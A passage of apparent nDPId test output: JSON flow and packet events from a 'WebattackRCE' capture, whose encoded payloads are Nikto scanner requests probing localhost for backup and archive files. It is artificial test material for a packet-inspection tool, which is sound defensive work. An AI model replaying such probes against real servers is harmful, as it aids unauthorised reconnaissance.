{"4":"DPI"},"proto":"HTTP","breed":"Acceptable","category":"Web"},"http": {"hostname":"127.0.0.1","url":"127.0.0.1\/1.tar.gz","code":0,"content_type":"","user_agent":"Mozilla\/5.00 (Nikto\/2.1.6) (Evasions:None) (Test:sitefiles)"}} +00586{"flow_event_id":1,"flow_event_name":"new","thread_id":0,"packet_id":378,"source":"WebattackRCE.pcap","alias":"nDPId-test","flow_id":378,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":1576420277274,"flow_last_seen":1576420277274,"flow_idle_time":7560000,"flow_min_l4_payload_len":140,"flow_max_l4_payload_len":140,"flow_tot_l4_payload_len":140,"flow_avg_l4_payload_len":140,"midstream":1,"thread_ts_msec":1576420277274,"l3_proto":"ip4","src_ip":"127.0.0.1","dst_ip":"127.0.0.1","src_port":50300,"dst_port":8080,"l4_proto":"tcp","flow_datalink":1,"flow_max_packets":3} +00666{"packet_event_id":2,"packet_event_name":"packet-flow","thread_id":0,"packet_id":378,"source":"WebattackRCE.pcap","alias":"nDPId-test","flow_id":378,"flow_packet_id":1,"flow_last_seen":1576420277274,"flow_idle_time":7560000,"pkt_oversize":false,"pkt_caplen":206,"pkt_type":2048,"pkt_l3_offset":14,"pkt_l4_offset":34,"pkt_len":206,"pkt_l4_len":172,"thread_ts_msec":1576420277274,"pkt":"AAAAAAAAAAAAAAAACABFAADAlOZAAEAGp09\/AAABfwAAAcR8H5CKg6xDWKPSxIAYAED+tAAAAQEICp1m\/UKdZv1CR0VUIC8xLnRhci5neiBIVFRQLzEuMQ0KVXNlci1BZ2VudDogTW96aWxsYS81LjAwIChOaWt0by8yLjEuNikgKEV2YXNpb25zOk5vbmUpIChUZXN0OnNpdGVmaWxlcykNCkNvbm5lY3Rpb246IEtlZXAtQWxpdmUNCkhvc3Q6IDEyNy4wLjAuMQ0KDQo="} +01057{"flow_event_id":6,"flow_event_name":"detected","thread_id":0,"packet_id":378,"source":"WebattackRCE.pcap","alias":"nDPId-test","flow_id":378,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":1576420277274,"flow_last_seen":1576420277274,"flow_idle_time":7560000,"flow_min_l4_payload_len":140,"flow_max_l4_payload_len":140,"flow_tot_l4_payload_len":140,"flow_avg_l4_payload_len":140,"midstream":1,"thread_ts_msec":1576420277274,"l3_proto":"ip4","src_ip":"127.0.0.1","dst_ip":"127.0.0.1","src_port":50300,"dst_port":8080,"l4_proto":"tcp","ndpi": {"flow_risk": {"5": {"risk":"Known Protocol on Non Standard Port","severity":"Medium","risk_score": {"total":260,"client":230,"server":30}},"12": {"risk":"HTTP Numeric IP Address","severity":"Low","risk_score": {"total":500,"client":450,"server":50}}},"confidence": {"4":"DPI"},"proto":"HTTP","breed":"Acceptable","category":"Web"},"http": {"hostname":"127.0.0.1","url":"127.0.0.1\/1.tar.gz","code":0,"content_type":"","user_agent":"Mozilla\/5.00 (Nikto\/2.1.6) (Evasions:None) (Test:sitefiles)"}} +00586{"flow_event_id":1,"flow_event_name":"new","thread_id":0,"packet_id":379,"source":"WebattackRCE.pcap","alias":"nDPId-test","flow_id":379,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":1576420277276,"flow_last_seen":1576420277276,"flow_idle_time":7560000,"flow_min_l4_payload_len":137,"flow_max_l4_payload_len":137,"flow_tot_l4_payload_len":137,"flow_avg_l4_payload_len":137,"midstream":1,"thread_ts_msec":1576420277276,"l3_proto":"ip4","src_ip":"127.0.0.1","dst_ip":"127.0.0.1","src_port":50302,"dst_port":8080,"l4_proto":"tcp","flow_datalink":1,"flow_max_packets":3} +00662{"packet_event_id":2,"packet_event_name":"packet-flow","thread_id":0,"packet_id":379,"source":"WebattackRCE.pcap","alias":"nDPId-test","flow_id":379,"flow_packet_id":1,"flow_last_seen":1576420277276,"flow_idle_time":7560000,"pkt_oversize":false,"pkt_caplen":203,"pkt_type":2048,"pkt_l3_offset":14,"pkt_l4_offset":34,"pkt_len":203,"pkt_l4_len":169,"thread_ts_msec":1576420277276,"pkt":"AAAAAAAAAAAAAAAACABFAAC9in1AAEAGsbt\/AAABfwAAAcR+H5AyA7LdjyrNp4AYAED+sQAAAQEICp1m\/USdZv1DR0VUIC8wLndhciBIVFRQLzEuMQ0KVXNlci1BZ2VudDogTW96aWxsYS81LjAwIChOaWt0by8yLjEuNikgKEV2YXNpb25zOk5vbmUpIChUZXN0OnNpdGVmaWxlcykNCkNvbm5lY3Rpb246IEtlZXAtQWxpdmUNCkhvc3Q6IDEyNy4wLjAuMQ0KDQo="} +01054{"flow_event_id":6,"flow_event_name":"detected","thread_id":0,"packet_id":379,"source":"WebattackRCE.pcap","alias":"nDPId-test","flow_id":379,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":1576420277276,"flow_last_seen":1576420277276,"flow_idle_time":7560000,"flow_min_l4_payload_len":137,"flow_max_l4_payload_len":137,"flow_tot_l4_payload_len":137,"flow_avg_l4_payload_len":137,"midstream":1,"thread_ts_msec":1576420277276,"l3_proto":"ip4","src_ip":"127.0.0.1","dst_ip":"127.0.0.1","src_port":50302,"dst_port":8080,"l4_proto":"tcp","ndpi": {"flow_risk": {"5": {"risk":"Known Protocol on Non Standard Port","severity":"Medium","risk_score": {"total":260,"client":230,"server":30}},"12": {"risk":"HTTP Numeric IP Address","severity":"Low","risk_score": {"total":500,"client":450,"server":50}}},"confidence": {"4":"DPI"},"proto":"HTTP","breed":"Acceptable","category":"Web"},"http": {"hostname":"127.0.0.1","url":"127.0.0.1\/0.war","code":0,"content_type":"","user_agent":"Mozilla\/5.00 (Nikto\/2.1.6) (Evasions:None) (Test:sitefiles)"}} +00586{"flow_event_id":1,"flow_event_name":"new","thread_id":0,"packet_id":380,"source":"WebattackRCE.pcap","alias":"nDPId-test","flow_id":380,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":1576420277277,"flow_last_seen":1576420277277,"flow_idle_time":7560000,"flow_min_l4_payload_len":137,"flow_max_l4_payload_len":137,"flow_tot_l4_payload_len":137,"flow_avg_l4_payload_len":137,"midstream":1,"thread_ts_msec":1576420277277,"l3_proto":"ip4","src_ip":"127.0.0.1","dst_ip":"127.0.0.1","src_port":50304,"dst_port":8080,"l4_proto":"tcp","flow_datalink":1,"flow_max_packets":3} +00663{"packet_event_id":2,"packet_event_name":"packet-flow","thread_id":0,"packet_id":380,"source":"WebattackRCE.pcap","alias":"nDPId-test","flow_id":380,"flow_packet_id":1,"flow_last_seen":1576420277277,"flow_idle_time":7560000,"pkt_oversize":false,"pkt_caplen":203,"pkt_type":2048,"pkt_l3_offset":14,"pkt_l4_offset":34,"pkt_len":203,"pkt_l4_len":169,"thread_ts_msec":1576420277277,"pkt":"AAAAAAAAAAAAAAAACABFAAC906lAAEAGaI9\/AAABfwAAAcSAH5AxZOsBFr\/0GYAYAED+sQAAAQEICp1m\/UWdZv1FR0VUIC8wLndhciBIVFRQLzEuMQ0KSG9zdDogMTI3LjAuMC4xDQpDb25uZWN0aW9uOiBLZWVwLUFsaXZlDQpVc2VyLUFnZW50OiBNb3ppbGxhLzUuMDAgKE5pa3RvLzIuMS42KSAoRXZhc2lvbnM6Tm9uZSkgKFRlc3Q6c2l0ZWZpbGVzKQ0KDQo="} +01054{"flow_event_id":6,"flow_event_name":"detected","thread_id":0,"packet_id":380,"source":"WebattackRCE.pcap","alias":"nDPId-test","flow_id":380,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":1576420277277,"flow_last_seen":1576420277277,"flow_idle_time":7560000,"flow_min_l4_payload_len":137,"flow_max_l4_payload_len":137,"flow_tot_l4_payload_len":137,"flow_avg_l4_payload_len":137,"midstream":1,"thread_ts_msec":1576420277277,"l3_proto":"ip4","src_ip":"127.0.0.1","dst_ip":"127.0.0.1","src_port":50304,"dst_port":8080,"l4_proto":"tcp","ndpi": {"flow_risk": {"5": {"risk":"Known Protocol on Non Standard Port","severity":"Medium","risk_score": {"total":260,"client":230,"server":30}},"12": {"risk":"HTTP Numeric IP Address","severity":"Low","risk_score": {"total":500,"client":450,"server":50}}},"confidence": {"4":"DPI"},"proto":"HTTP","breed":"Acceptable","category":"Web"},"http": {"hostname":"127.0.0.1","url":"127.0.0.1\/0.war","code":0,"content_type":"","user_agent":"Mozilla\/5.00 (Nikto\/2.1.6) (Evasions:None) (Test:sitefiles)"}} +00586{"flow_event_id":1,"flow_event_name":"new","thread_id":0,"packet_id":381,"source":"WebattackRCE.pcap","alias":"nDPId-test","flow_id":381,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":1576420277278,"flow_last_seen":1576420277278,"flow_idle_time":7560000,"flow_min_l4_payload_len":142,"flow_max_l4_payload_len":142,"flow_tot_l4_payload_len":142,"flow_avg_l4_payload_len":142,"midstream":1,"thread_ts_msec":1576420277278,"l3_proto":"ip4","src_ip":"127.0.0.1","dst_ip":"127.0.0.1","src_port":50306,"dst_port":8080,"l4_proto":"tcp","flow_datalink":1,"flow_max_packets":3} +00671{"packet_event_id":2,"packet_event_name":"packet-flow","thread_id":0,"packet_id":381,"source":"WebattackRCE.pcap","alias":"nDPId-test","flow_id":381,"flow_packet_id":1,"flow_last_seen":1576420277278,"flow_idle_time":7560000,"pkt_oversize":false,"pkt_caplen":208,"pkt_type":2048,"pkt_l3_offset":14,"pkt_l4_offset":34,"pkt_len":208,"pkt_l4_len":174,"thread_ts_msec":1576420277278,"pkt":"AAAAAAAAAAAAAAAACABFAADCR05AAEAG9OV\/AAABfwAAAcSCH5Cv93\/sjlpOBIAYAED+tgAAAQEICp1m\/UadZv1GR0VUIC9iYWNrdXAudGFyIEhUVFAvMS4xDQpIb3N0OiAxMjcuMC4wLjENClVzZXItQWdlbnQ6IE1vemlsbGEvNS4wMCAoTmlrdG8vMi4xLjYpIChFdmFzaW9uczpOb25lKSAoVGVzdDpzaXRlZmlsZXMpDQpDb25uZWN0aW9uOiBLZWVwLUFsaXZlDQoNCg=="} +01059{"flow_event_id":6,"flow_event_name":"detected","thread_id":0,"packet_id":381,"source":"WebattackRCE.pcap","alias":"nDPId-test","flow_id":381,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":1576420277278,"flow_last_seen":1576420277278,"flow_idle_time":7560000,"flow_min_l4_payload_len":142,"flow_max_l4_payload_len":142,"flow_tot_l4_payload_len":142,"flow_avg_l4_payload_len":142,"midstream":1,"thread_ts_msec":1576420277278,"l3_proto":"ip4","src_ip":"127.0.0.1","dst_ip":"127.0.0.1","src_port":50306,"dst_port":8080,"l4_proto":"tcp","ndpi": {"flow_risk": {"5": {"risk":"Known Protocol on Non Standard Port","severity":"Medium","risk_score": {"total":260,"client":230,"server":30}},"12": {"risk":"HTTP Numeric IP Address","severity":"Low","risk_score": {"total":500,"client":450,"server":50}}},"confidence": {"4":"DPI"},"proto":"HTTP","breed":"Acceptable","category":"Web"},"http": {"hostname":"127.0.0.1","url":"127.0.0.1\/backup.tar","code":0,"content_type":"","user_agent":"Mozilla\/5.00 (Nikto\/2.1.6) (Evasions:None) (Test:sitefiles)"}} +00586{"flow_event_id":1,"flow_event_name":"new","thread_id":0,"packet_id":382,"source":"WebattackRCE.pcap","alias":"nDPId-test","flow_id":382,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":1576420277279,"flow_last_seen":1576420277279,"flow_idle_time":7560000,"flow_min_l4_payload_len":142,"flow_max_l4_payload_len":142,"flow_tot_l4_payload_len":142,"flow_avg_l4_payload_len":142,"midstream":1,"thread_ts_msec":1576420277279,"l3_proto":"ip4","src_ip":"127.0.0.1","dst_ip":"127.0.0.1","src_port":50308,"dst_port":8080,"l4_proto":"tcp","flow_datalink":1,"flow_max_packets":3} +00671{"packet_event_id":2,"packet_event_name":"packet-flow","thread_id":0,"packet_id":382,"source":"WebattackRCE.pcap","alias":"nDPId-test","flow_id":382,"flow_packet_id":1,"flow_last_seen":1576420277279,"flow_idle_time":7560000,"pkt_oversize":false,"pkt_caplen":208,"pkt_type":2048,"pkt_l3_offset":14,"pkt_l4_offset":34,"pkt_len":208,"pkt_l4_len":174,"thread_ts_msec":1576420277279,"pkt":"AAAAAAAAAAAAAAAACABFAADCyNdAAEAGc1x\/AAABfwAAAcSEH5CsG\/B+ct073oAYAED+tgAAAQEICp1m\/UedZv1HR0VUIC9iYWNrdXAudGFyIEhUVFAvMS4xDQpVc2VyLUFnZW50OiBNb3ppbGxhLzUuMDAgKE5pa3RvLzIuMS42KSAoRXZhc2lvbnM6Tm9uZSkgKFRlc3Q6c2l0ZWZpbGVzKQ0KQ29ubmVjdGlvbjogS2VlcC1BbGl2ZQ0KSG9zdDogMTI3LjAuMC4xDQoNCg=="} +01059{"flow_event_id":6,"flow_event_name":"detected","thread_id":0,"packet_id":382,"source":"WebattackRCE.pcap","alias":"nDPId-test","flow_id":382,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":1576420277279,"flow_last_seen":1576420277279,"flow_idle_time":7560000,"flow_min_l4_payload_len":142,"flow_max_l4_payload_len":142,"flow_tot_l4_payload_len":142,"flow_avg_l4_payload_len":142,"midstream":1,"thread_ts_msec":1576420277279,"l3_proto":"ip4","src_ip":"127.0.0.1","dst_ip":"127.0.0.1","src_port":50308,"dst_port":8080,"l4_proto":"tcp","ndpi": {"flow_risk": {"5": {"risk":"Known Protocol on Non Standard Port","severity":"Medium","risk_score": {"total":260,"client":230,"server":30}},"12": {"risk":"HTTP Numeric IP Address","severity":"Low","risk_score": {"total":500,"client":450,"server":50}}},"confidence": {"4":"DPI"},"proto":"HTTP","breed":"Acceptable","category":"Web"},"http": {"hostname":"127.0.0.1","url":"127.0.0.1\/backup.tar","code":0,"content_type":"","user_agent":"Mozilla\/5.00 (Nikto\/2.1.6) (Evasions:None) (Test:sitefiles)"}} +00586{"flow_event_id":1,"flow_event_name":"new","thread_id":0,"packet_id":383,"source":"WebattackRCE.pcap","alias":"nDPId-test","flow_id":383,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":1576420277281,"flow_last_seen":1576420277281,"flow_idle_time":7560000,"flow_min_l4_payload_len":145,"flow_max_l4_payload_len":145,"flow_tot_l4_payload_len":145,"flow_avg_l4_payload_len":145,"midstream":1,"thread_ts_msec":1576420277281,"l3_proto":"ip4","src_ip":"127.0.0.1","dst_ip":"127.0.0.1","src_port":50310,"dst_port":8080,"l4_proto":"tcp","flow_datalink":1,"flow_max_packets":3} +00674{"packet_event_id":2,"packet_event_name":"packet-flow","thread_id":0,"packet_id":383,"source":"WebattackRCE.pcap","alias":"nDPId-test","flow_id":383,"flow_packet_id":1,"flow_last_seen":1576420277281,"flow_idle_time":7560000,"pkt_oversize":false,"pkt_caplen":211,"pkt_type":2048,"pkt_l3_offset":14,"pkt_l4_offset":34,"pkt_len":211,"pkt_l4_len":177,"thread_ts_msec":1576420277281,"pkt":"AAAAAAAAAAAAAAAACABFAADFYHdAAEAG27l\/AAABfwAAAcSGH5C8uFjeIpIdX4AYAED+uQAAAQEICp1m\/UidZv1IR0VUIC8xMjcuMC4wLjEuc3FsIEhUVFAvMS4xDQpIb3N0OiAxMjcuMC4wLjENClVzZXItQWdlbnQ6IE1vemlsbGEvNS4wMCAoTmlrdG8vMi4xLjYpIChFdmFzaW9uczpOb25lKSAoVGVzdDpzaXRlZmlsZXMpDQpDb25uZWN0aW9uOiBLZWVwLUFsaXZlDQoNCg=="} +01062{"flow_event_id":6,"flow_event_name":"detected","thread_id":0,"packet_id":383,"source":"WebattackRCE.pcap","alias":"nDPId-test","flow_id":383,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":1576420277281,"flow_last_seen":1576420277281,"flow_idle_time":7560000,"flow_min_l4_payload_len":145,"flow_max_l4_payload_len":145,"flow_tot_l4_payload_len":145,"flow_avg_l4_payload_len":145,"midstream":1,"thread_ts_msec":1576420277281,"l3_proto":"ip4","src_ip":"127.0.0.1","dst_ip":"127.0.0.1","src_port":50310,"dst_port":8080,"l4_proto":"tcp","ndpi": {"flow_risk": {"5": {"risk":"Known Protocol on Non Standard Port","severity":"Medium","risk_score": {"total":260,"client":230,"server":30}},"12": {"risk":"HTTP Numeric IP Address","severity":"Low","risk_score": {"total":500,"client":450,"server":50}}},"confidence": {"4":"DPI"},"proto":"HTTP","breed":"Acceptable","category":"Web"},"http": {"hostname":"127.0.0.1","url":"127.0.0.1\/127.0.0.1.sql","code":0,"content_type":"","user_agent":"Mozilla\/5.00 (Nikto\/2.1.6) (Evasions:None) (Test:sitefiles)"}} +00586{"flow_event_id":1,"flow_event_name":"new","thread_id":0,"packet_id":384,"source":"WebattackRCE.pcap","alias":"nDPId-test","flow_id":384,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":1576420277282,"flow_last_seen":1576420277282,"flow_idle_time":7560000,"flow_min_l4_payload_len":145,"flow_max_l4_payload_len":145,"flow_tot_l4_payload_len":145,"flow_avg_l4_payload_len":145,"midstream":1,"thread_ts_msec":1576420277282,"l3_proto":"ip4","src_ip":"127.0.0.1","dst_ip":"127.0.0.1","src_port":50312,"dst_port":8080,"l4_proto":"tcp","flow_datalink":1,"flow_max_packets":3} +00674{"packet_event_id":2,"packet_event_name":"packet-flow","thread_id":0,"packet_id":384,"source":"WebattackRCE.pcap","alias":"nDPId-test","flow_id":384,"flow_packet_id":1,"flow_last_seen":1576420277282,"flow_idle_time":7560000,"pkt_oversize":false,"pkt_caplen":211,"pkt_type":2048,"pkt_l3_offset":14,"pkt_l4_offset":34,"pkt_len":211,"pkt_l4_len":177,"thread_ts_msec":1576420277282,"pkt":"AAAAAAAAAAAAAAAACABFAADFoI1AAEAGm6N\/AAABfwAAAcSIH5D0M5gk0yESEIAYAED+uQAAAQEICp1m\/UqdZv1KR0VUIC8xMjcuMC4wLjEuc3FsIEhUVFAvMS4xDQpIb3N0OiAxMjcuMC4wLjENCkNvbm5lY3Rpb246IEtlZXAtQWxpdmUNClVzZXItQWdlbnQ6IE1vemlsbGEvNS4wMCAoTmlrdG8vMi4xLjYpIChFdmFzaW9uczpOb25lKSAoVGVzdDpzaXRlZmlsZXMpDQoNCg=="} +01062{"flow_event_id":6,"flow_event_name":"detected","thread_id":0,"packet_id":384,"source":"WebattackRCE.pcap","alias":"nDPId-test","flow_id":384,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":1576420277282,"flow_last_seen":1576420277282,"flow_idle_time":7560000,"flow_min_l4_payload_len":145,"flow_max_l4_payload_len":145,"flow_tot_l4_payload_len":145,"flow_avg_l4_payload_len":145,"midstream":1,"thread_ts_msec":1576420277282,"l3_proto":"ip4","src_ip":"127.0.0.1","dst_ip":"127.0.0.1","src_port":50312,"dst_port":8080,"l4_proto":"tcp","ndpi": {"flow_risk": {"5": {"risk":"Known Protocol on Non Standard Port","severity":"Medium","risk_score": {"total":260,"client":230,"server":30}},"12": {"risk":"HTTP Numeric IP Address","severity":"Low","risk_score": {"total":500,"client":450,"server":50}}},"confidence": {"4":"DPI"},"proto":"HTTP","breed":"Acceptable","category":"Web"},"http": {"hostname":"127.0.0.1","url":"127.0.0.1\/127.0.0.1.sql","code":0,"content_type":"","user_agent":"Mozilla\/5.00 (Nikto\/2.1.6) (Evasions:None) (Test:sitefiles)"}} +00586{"flow_event_id":1,"flow_event_name":"new","thread_id":0,"packet_id":385,"source":"WebattackRCE.pcap","alias":"nDPId-test","flow_id":385,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":1576420277283,"flow_last_seen":1576420277283,"flow_idle_time":7560000,"flow_min_l4_payload_len":143,"flow_max_l4_payload_len":143,"flow_tot_l4_payload_len":143,"flow_avg_l4_payload_len":143,"midstream":1,"thread_ts_msec":1576420277283,"l3_proto":"ip4","src_ip":"127.0.0.1","dst_ip":"127.0.0.1","src_port":50314,"dst_port":8080,"l4_proto":"tcp","flow_datalink":1,"flow_max_packets":3} +00670{"packet_event_id":2,"packet_event_name":"packet-flow","thread_id":0,"packet_id":385,"source":"WebattackRCE.pcap","alias":"nDPId-test","flow_id":385,"flow_packet_id":1,"flow_last_seen":1576420277283,"flow_idle_time":7560000,"pkt_oversize":false,"pkt_caplen":209,"pkt_type":2048,"pkt_l3_offset":14,"pkt_l4_offset":34,"pkt_len":209,"pkt_l4_len":175,"thread_ts_msec":1576420277283,"pkt":"AAAAAAAAAAAAAAAACABFAADDBOlAAEAGN0p\/AAABfwAAAcSKH5Dv6jxQN18efIAYAED+twAAAQEICp1m\/UudZv1LR0VUIC8xMjcuMC4wLmVnZyBIVFRQLzEuMQ0KQ29ubmVjdGlvbjogS2VlcC1BbGl2ZQ0KVXNlci1BZ2VudDogTW96aWxsYS81LjAwIChOaWt0by8yLjEuNikgKEV2YXNpb25zOk5vbmUpIChUZXN0OnNpdGVmaWxlcykNCkhvc3Q6IDEyNy4wLjAuMQ0KDQo="} +01060{"flow_event_id":6,"flow_event_name":"detected","thread_id":0,"packet_id":385,"source":"WebattackRCE.pcap","alias":"nDPId-test","flow_id":385,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":1576420277283,"flow_last_seen":1576420277283,"flow_idle_time":7560000,"flow_min_l4_payload_len":143,"flow_max_l4_payload_len":143,"flow_tot_l4_payload_len":143,"flow_avg_l4_payload_len":143,"midstream":1,"thread_ts_msec":1576420277283,"l3_proto":"ip4","src_ip":"127.0.0.1","dst_ip":"127.0.0.1","src_port":50314,"dst_port":8080,"l4_proto":"tcp","ndpi": {"flow_risk": {"5": {"risk":"Known Protocol on Non Standard Port","severity":"Medium","risk_score": {"total":260,"client":230,"server":30}},"12": {"risk":"HTTP Numeric IP Address","severity":"Low","risk_score": {"total":500,"client":450,"server":50}}},"confidence": {"4":"DPI"},"proto":"HTTP","breed":"Acceptable","category":"Web"},"http": {"hostname":"127.0.0.1","url":"127.0.0.1\/127.0.0.egg","code":0,"content_type":"","user_agent":"Mozilla\/5.00 (Nikto\/2.1.6) (Evasions:None) (Test:sitefiles)"}} +00586{"flow_event_id":1,"flow_event_name":"new","thread_id":0,"packet_id":386,"source":"WebattackRCE.pcap","alias":"nDPId-test","flow_id":386,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":1576420277284,"flow_last_seen":1576420277284,"flow_idle_time":7560000,"flow_min_l4_payload_len":143,"flow_max_l4_payload_len":143,"flow_tot_l4_payload_len":143,"flow_avg_l4_payload_len":143,"midstream":1,"thread_ts_msec":1576420277284,"l3_proto":"ip4","src_ip":"127.0.0.1","dst_ip":"127.0.0.1","src_port":50316,"dst_port":8080,"l4_proto":"tcp","flow_datalink":1,"flow_max_packets":3} +00670{"packet_event_id":2,"packet_event_name":"packet-flow","thread_id":0,"packet_id":386,"source":"WebattackRCE.pcap","alias":"nDPId-test","flow_id":386,"flow_packet_id":1,"flow_last_seen":1576420277284,"flow_idle_time":7560000,"pkt_oversize":false,"pkt_caplen":209,"pkt_type":2048,"pkt_l3_offset":14,"pkt_l4_offset":34,"pkt_len":209,"pkt_l4_len":175,"thread_ts_msec":1576420277284,"pkt":"AAAAAAAAAAAAAAAACABFAADDCzNAAEAGMQB\/AAABfwAAAcSMH5CEzzOZEWOd+IAYAED+twAAAQEICp1m\/UydZv1MR0VUIC8xMjcuMC4wLmVnZyBIVFRQLzEuMQ0KSG9zdDogMTI3LjAuMC4xDQpVc2VyLUFnZW50OiBNb3ppbGxhLzUuMDAgKE5pa3RvLzIuMS42KSAoRXZhc2lvbnM6Tm9uZSkgKFRlc3Q6c2l0ZWZpbGVzKQ0KQ29ubmVjdGlvbjogS2VlcC1BbGl2ZQ0KDQo="} +01060{"flow_event_id":6,"flow_event_name":"detected","thread_id":0,"packet_id":386,"source":"WebattackRCE.pcap","alias":"nDPId-test","flow_id":386,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":1576420277284,"flow_last_seen":1576420277284,"flow_idle_time":7560000,"flow_min_l4_payload_len":143,"flow_max_l4_payload_len":143,"flow_tot_l4_payload_len":143,"flow_avg_l4_payload_len":143,"midstream":1,"thread_ts_msec":1576420277284,"l3_proto":"ip4","src_ip":"127.0.0.1","dst_ip":"127.0.0.1","src_port":50316,"dst_port":8080,"l4_proto":"tcp","ndpi": {"flow_risk": {"5": {"risk":"Known Protocol on Non Standard Port","severity":"Medium","risk_score": {"total":260,"client":230,"server":30}},"12": {"risk":"HTTP Numeric IP Address","severity":"Low","risk_score": {"total":500,"client":450,"server":50}}},"confidence": {"4":"DPI"},"proto":"HTTP","breed":"Acceptable","category":"Web"},"http": {"hostname":"127.0.0.1","url":"127.0.0.1\/127.0.0.egg","code":0,"content_type":"","user_agent":"Mozilla\/5.00 (Nikto\/2.1.6) (Evasions:None) (Test:sitefiles)"}} +00586{"flow_event_id":1,"flow_event_name":"new","thread_id":0,"packet_id":387,"source":"WebattackRCE.pcap","alias":"nDPId-test","flow_id":387,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":1576420277286,"flow_last_seen":1576420277286,"flow_idle_time":7560000,"flow_min_l4_payload_len":137,"flow_max_l4_payload_len":137,"flow_tot_l4_payload_len":137,"flow_avg_l4_payload_len":137,"midstream":1,"thread_ts_msec":1576420277286,"l3_proto":"ip4","src_ip":"127.0.0.1","dst_ip":"127.0.0.1","src_port":50318,"dst_port":8080,"l4_proto":"tcp","flow_datalink":1,"flow_max_packets":3} +00662{"packet_event_id":2,"packet_event_name":"packet-flow","thread_id":0,"packet_id":387,"source":"WebattackRCE.pcap","alias":"nDPId-test","flow_id":387,"flow_packet_id":1,"flow_last_seen":1576420277286,"flow_idle_time":7560000,"pkt_oversize":false,"pkt_caplen":203,"pkt_type":2048,"pkt_l3_offset":14,"pkt_l4_offset":34,"pkt_len":203,"pkt_l4_len":169,"thread_ts_msec":1576420277286,"pkt":"AAAAAAAAAAAAAAAACABFAAC9CzBAAEAGMQl\/AAABfwAAAcSOH5AKIDOIyoTTQIAYAED+sQAAAQEICp1m\/U2dZv1NR0VUIC8xLmVnZyBIVFRQLzEuMQ0KSG9zdDogMTI3LjAuMC4xDQpVc2VyLUFnZW50OiBNb3ppbGxhLzUuMDAgKE5pa3RvLzIuMS42KSAoRXZhc2lvbnM6Tm9uZSkgKFRlc3Q6c2l0ZWZpbGVzKQ0KQ29ubmVjdGlvbjogS2VlcC1BbGl2ZQ0KDQo="} +01054{"flow_event_id":6,"flow_event_name":"detected","thread_id":0,"packet_id":387,"source":"WebattackRCE.pcap","alias":"nDPId-test","flow_id":387,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":1576420277286,"flow_last_seen":1576420277286,"flow_idle_time":7560000,"flow_min_l4_payload_len":137,"flow_max_l4_payload_len":137,"flow_tot_l4_payload_len":137,"flow_avg_l4_payload_len":137,"midstream":1,"thread_ts_msec":1576420277286,"l3_proto":"ip4","src_ip":"127.0.0.1","dst_ip":"127.0.0.1","src_port":50318,"dst_port":8080,"l4_proto":"tcp","ndpi": {"flow_risk": {"5": {"risk":"Known Protocol on Non Standard Port","severity":"Medium","risk_score": {"total":260,"client":230,"server":30}},"12": {"risk":"HTTP Numeric IP Address","severity":"Low","risk_score": {"total":500,"client":450,"server":50}}},"confidence": {"4":"DPI"},"proto":"HTTP","breed":"Acceptable","category":"Web"},"http": {"hostname":"127.0.0.1","url":"127.0.0.1\/1.egg","code":0,"content_type":"","user_agent":"Mozilla\/5.00 (Nikto\/2.1.6) (Evasions:None) (Test:sitefiles)"}} +00586{"flow_event_id":1,"flow_event_name":"new","thread_id":0,"packet_id":388,"source":"WebattackRCE.pcap","alias":"nDPId-test","flow_id":388,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":1576420277288,"flow_last_seen":1576420277288,"flow_idle_time":7560000,"flow_min_l4_payload_len":137,"flow_max_l4_payload_len":137,"flow_tot_l4_payload_len":137,"flow_avg_l4_payload_len":137,"midstream":1,"thread_ts_msec":1576420277288,"l3_proto":"ip4","src_ip":"127.0.0.1","dst_ip":"127.0.0.1","src_port":50320,"dst_port":8080,"l4_proto":"tcp","flow_datalink":1,"flow_max_packets":3} +00663{"packet_event_id":2,"packet_event_name":"packet-flow","thread_id":0,"packet_id":388,"source":"WebattackRCE.pcap","alias":"nDPId-test","flow_id":388,"flow_packet_id":1,"flow_last_seen":1576420277288,"flow_idle_time":7560000,"pkt_oversize":false,"pkt_caplen":203,"pkt_type":2048,"pkt_l3_offset":14,"pkt_l4_offset":34,"pkt_len":203,"pkt_l4_len":169,"thread_ts_msec":1576420277288,"pkt":"AAAAAAAAAAAAAAAACABFAAC9JlVAAEAGFeR\/AAABfwAAAcSQH5Clfx76D\/AiGIAYAED+sQAAAQEICp1m\/VCdZv1QR0VUIC8xLmVnZyBIVFRQLzEuMQ0KSG9zdDogMTI3LjAuMC4xDQpVc2VyLUFnZW50OiBNb3ppbGxhLzUuMDAgKE5pa3RvLzIuMS42KSAoRXZhc2lvbnM6Tm9uZSkgKFRlc3Q6c2l0ZWZpbGVzKQ0KQ29ubmVjdGlvbjogS2VlcC1BbGl2ZQ0KDQo="} +01054{"flow_event_id":6,"flow_event_name":"detected","thread_id":0,"packet_id":388,"source":"WebattackRCE.pcap","alias":"nDPId-test","flow_id":388,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":1576420277288,"flow_last_seen":1576420277288,"flow_idle_time":7560000,"flow_min_l4_payload_len":137,"flow_max_l4_payload_len":137,"flow_tot_l4_payload_len":137,"flow_avg_l4_payload_len":137,"midstream":1,"thread_ts_msec":1576420277288,"l3_proto":"ip4","src_ip":"127.0.0.1","dst_ip":"127.0.0.1","src_port":50320,"dst_port":8080,"l4_proto":"tcp","ndpi": {"flow_risk": {"5": {"risk":"Known Protocol on Non Standard Port","severity":"Medium","risk_score": {"total":260,"client":230,"server":30}},"12": {"risk":"HTTP Numeric IP Address","severity":"Low","risk_score": {"total":500,"client":450,"server":50}}},"confidence": 